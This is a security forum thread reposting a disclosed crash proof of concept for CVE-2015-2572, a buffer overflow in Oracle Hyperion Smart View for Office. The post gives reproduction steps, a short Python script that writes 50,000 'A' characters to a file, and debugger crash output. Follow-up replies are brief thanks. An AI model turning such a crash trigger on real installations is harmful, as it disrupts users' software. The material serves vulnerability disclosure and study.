查看: 35657|回复: 139

[CVE-2015-2572]Oracle PoC

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-4-23 10:08:34 | 显示全部楼层 |阅读模式
    Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC
    CVE-2015-2572
    # Exploit Title: Buffer Overflow in Oracle  Hyperion Smart View for Office
    [DOS]
    # Exploit Author: sajith
    # Vendor Homepage: http://oracle.com
    # vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
    #Vulnerable Link:
    http://www.oracle.com/technetwor ... ownloads/index.html
    # Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1
    [x64],en-us
    #plugin tested with Microsoft Excel 2010

    Responsible Disclosure:
      
    Reported to Oracle on Jul 7, 2014
    patch released on April 14, 2015
      
    How to reproduce the bug?
      
      
    1)install "Smart view" and open Microsoft excel and click on "smart view"
    tab
      
    2)click on "Options" and then click on "Advanced" tab
      
    3) In General menu in "shared Connections URL" enter large value say 50000
    "A"'s and press ok, the application crashes, the output of the crash
    analyzed in debugger is shown below
      
    1. Note:Plugin once installed automatically integrates with Microsoft office
    2. products like,excel,Word,PowerPoint,Microsoft office.so the vulnerability
    3. can be exploited via any of these products.
    复制代码

      
    ==================python script to create 50000 "A"'s============
    [Python] 纯文本查看 复制代码
    
    try:
      
        print "POC by sajith shetty"
      
        f = open("text.txt","w")
      
        junk = "A" * 50000
      
        f.write(junk)
      
        print "done"
      
    except Exception, e:
      
            print "error- " + str(e)
      
      
    Debugger o/p:
      
    eax=00410061 ebx=0041005d ecx=00410041 edx=00000000 esi=00410061
    edi=0041005d
    eip=779622d2 esp=0040b7f8 ebp=0040b80c iopl=0         nv up ei pl nz na pe
    nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
    efl=00010206
    ntdll!RtlEnterCriticalSection+0x12:
    779622d2 f00fba3000      lock btr dword ptr [eax],0
    ds:002b:00410061=????????
      
    caused by MODULE_NAME: HsAddin
      
      
    start    end        module name
    0fb50000 111a0000   HsAddin    (export symbols)
    C:\Oracle\SmartView\bin\HsAddin.dll
        Loaded symbol image file: C:\Oracle\SmartView\bin\HsAddin.dll
        Image path: C:\Oracle\SmartView\bin\HsAddin.dll
        Image name: HsAddin.dll
        Timestamp:        Wed Mar 27 04:27:50 2013 (515227EE)
        CheckSum:         0163F951
        ImageSize:        01650000
        File version:     11.1.2.3085
        Product version:  11.1.2.3085
        File flags:       0 (Mask 3F)
        File OS:          4 Unknown Win32
        File type:        2.0 Dll
        File date:        00000000.00000000
        Translations:     0409.04b0
        CompanyName:      Oracle Corporation
        ProductName:      Oracle  Hyperion Smart View for Office, Fusion Edition
        InternalName:     CommonAddin
        ProductVersion:   11.1.2.3.000.157
        FileVersion:      11.1.2.3085
        FileDescription:  Oracle  Hyperion Smart View for Office, Fusion Edition
        LegalCopyright:   Copyright 2004, 2013 Oracle Corporation.  All rights
    reserved
        LegalTrademarks:  Oracle  is registered.
     
    [2015-04-23]  #
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2020-1-8 01:25
  • 签到天数: 47 天

    [LV.5]常住居民I

    发表于 2015-4-24 23:04:31 | 显示全部楼层
    谢谢分享,学习下!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-1 17:32:29 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 03:36:57 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 09:31:20 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 10:01:09 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 23:15:43 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-3 03:44:37 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-4 21:42:45 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-5 00:44:30 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 11:42 , Processed in 0.027601 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部